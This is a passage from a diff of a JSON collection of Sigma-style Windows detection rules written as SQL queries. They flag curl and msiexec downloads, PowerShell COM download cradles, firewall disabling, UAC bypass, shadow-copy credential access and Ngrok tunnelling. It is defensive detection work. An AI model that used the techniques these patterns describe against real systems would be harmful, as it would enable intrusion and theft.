ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_msiexec_web_install.yml" }, { - "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", - "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", "status": "experimental", - "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", - "author": "@gott_cyber", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.defense_evasion", - "attack.t1218", "attack.t1105" ], "falsepositives": [ - "Since the content of the files are unknown, false positives are expected" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ldifde_file_load.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Application Removed Via Wmic.EXE", - "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "title": "WSL Child Process Anomaly", + "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", "status": "experimental", - "description": "Uninstall an application with wmic", - "author": "frac113", + "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_application.yml" + "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" }, { - "title": "Potential Network Sniffing Activity Using Network Tools", - "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "title": "IIS Native-Code Module Command Line Installation", + "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", "status": "test", - "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious IIS native-code module installations via command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Legitimate administration activity to troubleshoot network issues" + "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR Image LIKE '%\\\\windump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_network_sniffing.yml" + "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "title": "Use of TTDInject.exe", + "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_lolbin_ttdinject.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - Process Creation", - "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", - "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", - "author": "frack113", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + "status": "test", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], "falsepositives": [ - "Legitimate use of the library" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_download_com_cradles.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", - "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", - "author": "Florian Roth (Nextron Systems)", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1557.001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": "Direct Autorun Keys Modification", - "id": "24357373-078f-44ed-9ac4-6d334a668a11", + "title": "Domain Trust Discovery Via Dsquery", + "id": "3bad990e-4848-4a78-9530-b427d854aac0", "status": "test", - "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", + "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", + "author": "E.M. Anhaus, Tony Lambert, oscd.community, omkar72", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Legitimate use of the utilities by legitimate user for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" + "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" }, { - "title": "New Firewall Rule Added Via Netsh.EXE", - "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects the addition of a new rule to the Windows firewall via netsh", - "author": "Markus Neis, Sander Wiebing", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_netsh_fw_add_rule.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", - "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "title": "Use Of The SFTP.EXE Binary As A LOLBIN", + "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "status": "experimental", + "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_lolbin_sftp.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", - "status": "test", - "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027.005" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Firewall Disabled via Netsh.EXE", - "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", - "status": "test", - "description": "Detects netsh commands that turns off the Windows firewall", - "author": "Fatih Sirin", + "title": "Service Security Descriptor Tampering Via Sc.EXE", + "id": "98c5aeef-32d5-492f-b174-64a691896d25", + "status": "experimental", + "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1562.004", - "attack.s0108" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_disable.yml" + "filename": "proc_creation_win_sc_sdset_modification.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", - "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Suspicious Csc.exe Source File Folder", + "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "status": "test", + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1027.004" ], "falsepositives": [ - "Unknown" + "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", + "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 